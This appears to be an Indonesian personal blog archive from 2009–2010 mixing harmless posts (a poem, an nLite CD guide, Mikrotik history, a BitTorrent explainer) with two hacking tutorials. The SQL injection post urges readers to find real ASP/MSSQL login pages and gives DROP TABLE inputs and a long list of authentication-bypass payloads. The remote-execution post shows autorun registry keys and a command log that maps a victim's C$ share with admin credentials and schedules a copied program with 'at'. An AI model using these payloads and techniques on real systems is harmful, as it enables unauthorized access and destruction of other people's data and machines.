Minggu, 28 November 2010
Internet Gratis dengan Telkomsel Flash
Jumat, 04 Juni 2010
SQL Injection 1
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Sabtu, 22 Mei 2010
Menjalankan Program secara Remote dalam satu Networking
Mengcopykan file jahat ke komputer korban memanglah mudah. Tapi untuk menjalankan program tersebut adalah masalah yang berbeda. Seandainya program telah berhasil anda copykan ke komputer korban, maka bila ingin menjalankannya seorang hacker tidak bisa langsung menklik program tersebut. Karena bila mengkliknya, otomatis komputer lah yang menjalankan program tersebut, Kata bang Mamat waktu smp “ibarat senjata makan tuan” tentunya anda tidak ingin seperti ini bukan. Lalu bagaimana menjalankan program pada computer remote ?. Ada beberapa cara yang bisa dilakukan, dan hal ini memiliki spesifikasi tertentu pula pada system operasi yang digunakan oleh korban.
1. Melakukan perubahan pada Registry.
Untuk melakukan perubahan registry secara remote, Hacker terlebih dahulu harus mendapatkan Hak penuh Administrator computer korban. Banyak software untuk mendapatkan password Administrator salah satunya John the ripper yang tidak akan di bahas disini. Cara lainnya dengan mengetikkan Command pada menu Run Lusrmgr.msc dan rubahlah pass admin dengan pass baru anda (yang saya herankan disini Microsoft tidak meminta password lama untuk mengganti password baru). Haha..
Dan inilah dia lokasi penyimpanannya :
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunonceEx
2. Memanipulasi file win.ini dan system.ini
Cara ini hanya berlaku pada sistem operasi Windows 9x dan Me. Sedangkan untuk XP dan 2003 sudah tidak menggunakan file ini lagi. Berikut contoh entry untuk dimasukkan dalam file win.ini dan system.ini :
Win.ini
Run=C:\WINDOWS\SYSTEM\shutdown.exe
Load=System.ini
[boot]
Shell=Explorer.exe
C:\WINDOWS\SYSTEM\shutdown.exe
3. Menyimpan program pada Direktori startup.
Directory startup adalah dir khusus pada windows untuk menjalankan program secara otomatis ketika computer dihidupkan. Bisa anda lihat pada menu START?PROGRAMS ?STARTUP. Lokasi penyimpanan file startup bisa anda lihat di : C:\Documents and S e t t i n g s \ % n a m a u s e r % \ S t a r t Menu\Programs\Startup (NT, 2000, XP) C:\WINDOWS\Start Menu\Programs\Startup (9x, Me)
4. Scheduling dengan perintah AT
Ini merupakan teknik yang paling efisien menurut saya, karena Hacker tidak perlu menunggu computer korban untuk melakukan startup. Berikut saya perlihatkan beberapa contoh penggunaan cara ini, yang akan membuat computer korban yang diremote bertekuk lutut dihadapan anda. Hal pertama yang saya lakukan adalah melakukan Mapping drive c: dari computer korban (192.168.100.20 ) menjadi drive x: pada computer saya. Terlihat bahwa account yang digunakan adalah Administrator dengan password “passwordnyaapa”. Setelah koneksi diterima, saya memberikan perintah copy shutdown.exe x: yang bertujuan mengcopykan file shutdown.exe ke computer korban. (dengan asumsi drive x saya adalah drive c: computer korban) Kemudian disini saya melakukan penyesuaian waktu / jam computer korban dengan command net time \\192.168.100.20 . terlihat waktu pada computer korban menunjukan pukul 7:37 AM. Langkah akhir yang paling menentukan keberhasilan ini adalah perintah scheduling yang tepat. Terlihat waktu yang ditunjukan pada computer korban pukul 7:37 AM , maka saya memberikan perintah scheduling dengan command at \\192.168.100.20 7:40A “c:\shutdown.exe” untuk menjalankan program shutdown.exe pada pukul 7:40 AM , tepatnya 3 menit berikutnya. Anda dapat menentukan waktu yang berbeda sesuai dengan waktu yang ingin anda tetapkan. Untuk melihat dan memastikan bahwa serangan anda berhasil, silahkan melakukan ping atau cek scheduling yang telah anda buat tadi dengan menggunakan command at \\192.168.100.20. Tugas anda telah selesai, silahkan duduk dan buatlah secangkir kopi untuk menunggu waktu kemenangan anda....
Microsoft Windows XP [Version
5.1.2600] (C) Copyright 1985-2001
Microsoft Corp.
C:\Documents and Settings\User>CD\
C:\>net use x: \\192.168.100.20\c$
/user:administrator passwordnyaapa
The command completed successfully.
C:\>copy shutdown.exe x:
1 file (s) copied.
C:\>net time \\192.168.100.20
Current time at \\192.168.100.20 is
2/21/2008 7:37 AM
The command completed successfully.
C:\>at \\192.168.100.20 7:40A
“c:\shutdown.exe”
Added a new job with job ID = 1
C:\>at \\192.168.100.20
StatusID Day Time Command Line
-------------------------------------
1 Today,7:40 AM c:\shutdown.exe
C:\>at \\192.168.100.20
There are no entries in the list.
Minggu, 11 April 2010
11 April 2010
hati adalah satu-satunya pintu bagi datangnya pengertian yang langkah-langkahnya bisa mengambang dan terseret, atau yang berdentam dengan irama yang memperburuk degup ketakutan jantung kita, ...
yang dengan cara-cara yang misterius membuat kita 'mendengar' kata-kata penunjuk kepada jalan setapak yang ternyata telah lama berbaring di depan pintu penyelesaian masalah-masalah kita.
Dengannya,
Hati adalah juga pembuka jalan.
tetapi bagi dia yang menolak untuk mendengar arti -
adalah alasan untuk mengakhiri upaya untuk tetap bertahan.
Karena, hati yang menolak mendengar arti akan menjadi sebuah jalan luas di tengah tanah lapang - tetapi yang terlihat buntu.
Maka,
Anda yang berpikiran baik lah, yang akan melihat kebaikan.
Dan Anda yang berhati baik lah yang akan mendengar kebaikan.
Senin, 22 Maret 2010
Membuat CD Instalasi Windows Menggunakan nLite
Artikel ini ditujukan buat kamu yang tidak terlalu mengerti bagaimana membuat sebuah cd instalan windows (bootablee) . Biasanya hal ini saya lalukan untuk membackup cd windows yang sudah ada, takutnya hilang rusak atau gak bisa kebaca lagi karena mungkin sangat sering dipakai.
Sebenernya membuat cd instalan windows (bootable) sangat mudah, terima kasih untuk pembuat program Nlite. Dengan program ini kita dapat membuat sebuah cd master windows dengan cepat, tidak hanya itu program ini menawarkan juga berbagai macam fitur menarik lainya seperti Driver Integration , dimana kita bisa memasukan driver tertentu kedalam master windows yang akan kita buat sehingga akan otomatis terinstall di windows kita.
tahap pembuatan cd instalan windows:
1.download ntlite disini , program ini membutuhkan .NET Framework 2.0 .
2. Setelah didownload, install di komputer kamu lalu jalankan Nlite:
pilih lokasi folder tempat files instalan windows ( setelah di copy dr cd master windows )
2.Selanjutnya tinggal next, lalu tekan Bootable ISO
3.Selanjutnya next lalu pilih direct burn ( jangan lupa masukan cd blank ke cd rom kamu ) , pilih kecepatan speed paling rendah, centang verify lalu tekan burn untuk memulai proses pembakaran cd.
mudah kan ?
Kamis, 10 September 2009
Sejarah Mikrotik
Untuk negara berkembang, solusi Mikrotik sangat membantu ISP atau perusahaan-perusahaan kecil yang ingin bergabung dengan Internet. Walaupun sudah banyak tersedia perangkat router mini sejenis NAT, dalam beberapa kondisi penggunaan komputer dan software Mikrotik merupakan solusi terbaik. Mikrotik adalah perusahaan kecil berkantor pusat di Latvia, bersebelahan dengan Rusia, pembentukannya diprakarsai oleh John Trully dan Arnis Riekstins. John Trully adalah orang Amerika yang berimigrasi ke Latvia dan berjumpa Arnis yang sarjana Fisika dan Mekanik di sekitar tahun 1995.
Tahun 1996 John dan Arnis mulai me-routing dunia (visi Mikrotik adalah me-routing seluruh dunia). Mulai dengan sistem Linux dan MS DOS yang dikombinasikan dengan teknologi Wireless LAN (W-LAN) Aeronet berkecepatan 2Mbps di Molcova, tetangga Latvia, baru kemudian melayani lima pelanggannya di Latvia. Ketika saya menanyakan berapa jumlah pelanggan yang dilayaninya saat ini, Arnis menyebut antara 10 sampai 20 pelanggan saja, karena ambisi mereka adalah membuat satu peranti lunak router yang handal dan disebarkan ke seluruh dunia. Ini agak kontradiksi dengan informasi yang ada di web Mikrotik, bahwa mereka mempunyai 600 titik (pelanggan) wireless dan terbesar di dunia. Padahal dengan wireless di Jogja dan Bandung saja, kemungkinan besar mereka sudah kalah bersaing.
Prinsip dasar mereka bukan membuat Wireless ISP (WISP), tapi membuat program router yang handal dan dapat dijalankan di seluruh dunia. Latvia hanya merupakan “tempat eksperimen” John dan Arnis, karena saat ini mereka sudah membantu negara-negara lain termasuk Srilanka yang melayani sekitar empat ratusan pelanggannya.
Linux yang mereka gunakan pertama kali adalah Kernel 2.2 yang dikembangkan secara bersama-sama dengan bantuan 5 – 15 orang staf R&D Mikrotik yang sekarang menguasai dunia routing di negara-negara berkembang. Selain staf di lingkungan Mikrotik, menurut Arnis, mereka merekrut juga tenaga-tenaga lepas dan pihak ketiga yang dengan intensif mengembangkan Mikrotik secara maraton.
Ketika ditanya siapa saja pesaing Mikrotik, Arnis tersenyum dan enggan mengatakannya. Sewaktu saya simpulkan tidak ada pesaing, Arnis dengan sedikit tertawa menyebut satu nama yang memang sudah lumayan terkenal sebagai produsen perangkat keras khusus untuk teknologi W-LAN, yaitu Soekris dari Amerika. Tujuan utama mereka berdua adalah membangun software untuk routing, sementara kebutuhan akan perangkat keras juga terus berkembang, sehingga akhirnya mereka membuat berbagai macam perangkat keras yang berhubungan dengan software yang mereka kembangkan.
Semangat Mikrotik ini agak berbeda dari kebanyakan perusahaan sejenis di Amerika, karena mereka berkonsentrasi di pengembangan software lalu mencari solusi di hardware-nya dengan mengajak pihak ketiga untuk berkolaborasi. Dan kita dapat melihat ragam perangkat yang mereka tawarkan menjadi semakin banyak, mulai dari perangkat yang bekerja di frekwensi 2,4GHz dan 5,8GHz sampai ke interface dan antena.
Keahlian Mikrotik sebetulnya di perangkat lunak routernya, karena terlihat mereka berjualan perangkat W-LAN dengan antena omni yang sangat tidak dianjurkan pemakaiannya di dunia W-LAN, karena sangat sensitif terhadap gangguan dan interferensi. Walaupun punya tujuan yang sangat jelas, yaitu mendistribusikan sinyal ke segala arah sehingga merupakan solusi murah.
Kepopuleran Mikrotik menyebar juga ke Indonesia. Pertama kali masuk tahun 2001 ke Jogja melalui Citraweb oleh Valens Riyadi dan kawan-kawan, lalu meluas menjadi satu solusi murah untuk membangun ISP, terutama yang berbasis W-LAN. Kebetulan sekali, Jogja merupakan salah satu kota di Indonesia yang populasi pemakaian W-LAN-nya terbesar kalau dibandingkan luas daerahnya.
Keberhasilan Mikrotik me-routing dunia merupakan satu contoh, bahwa kita semua mampu membantu calon pemakai Internet untuk masuk ke dunia maya, terutama membantu membangun infrastrukturnya.
Sumber : mikrotik.co.id
Selasa, 18 Agustus 2009
Apakah Itu Bittorent
komputer yang dikenal dengan istilah peer-to-peer file sharing (P2P) communications
protocol. Jadi komputer Anda di rumah akan terhubung dengan milyaran komputer lain
dari seluruh dunia. Anda bisa mencari data-data seperti file musik, video, software,
artikel atau apapun yang bermanfaat.
Protokol BitTorrent ini dibuat dengan bahasa pemrograman Python oleh Bram Cohen
pada bulan April 2001 dan dirilis pada tanggal 2 Juli 2001. Protokol tersebut kini
dikembangkan oleh Cohen's company BitTorrent, Inc.
Agar komputer Anda dapat terhubung dengan komputer lain dalam berbagi file, Anda
membutuhkan koneksi internet dan software yang menggunakan BitTorrent protocol
yang dikenal dengan istilah BitTorrent client. Program tersebut dapat Anda gunakan
untuk mencari file musik, video, software atau artikel yang dapat didownload. Contoh
BitTorrent client dapat Anda download secara GRATIS di http://www.utorrent.com.
Sumber http://www.umkc.edu
2
Teknik download file menggunakan protokol BitTorrent sangat berbeda dengan cara
download biasa. Download dengan cara biasa hanya mendownload satu file pada satu
server atau komputer saja. Tetapi dengan protokol BitTorrent, ketika anda mendownload
satu file, protokol ini bisa mencarinya dari banyak tempat yang berbeda. Misalkan Anda
ingin mendownload file video. Satu file video bisa didownload dari banyak tempat yang
berbeda dan dari setiap tempat tersebut diambil secuil demi secuil bagian file sampai
menjadi file yang utuh untuk diletakkan di komputer anda. Dengan cara ini, besar
bandwidth yang dibutuhkan dapat dikurangi sehingga tidak memberatkan server
sekaligus meningkatkan kecepatan download.
Kita lihat gambar salah satu software torrent di bawah ini. Satu file bisa didownload dari
banyak komputer menjadi potongan-potongan yang tidak urut. Tetapi hasil akhirnya akan
menjadi satu file yang utuh.
Untuk mendapatkan file-file torrent, Anda juga bisa mencarinya di di google. Misalkan
ingin mencari software Open Office. Di google ketik saja "Open Office Torrent".
Kemudian Anda klik file torrent tersebut dan akan tersimpan di komputer anda menjadi
”nama file.torrent”.
Setelah itu klik file torrent tersebut dan software Torrent akan mendownload-nya untuk
Anda. Jadi sebelum Anda mendownload file torrent dari website, pastikan Anda sudah
menginstall software torrentnya.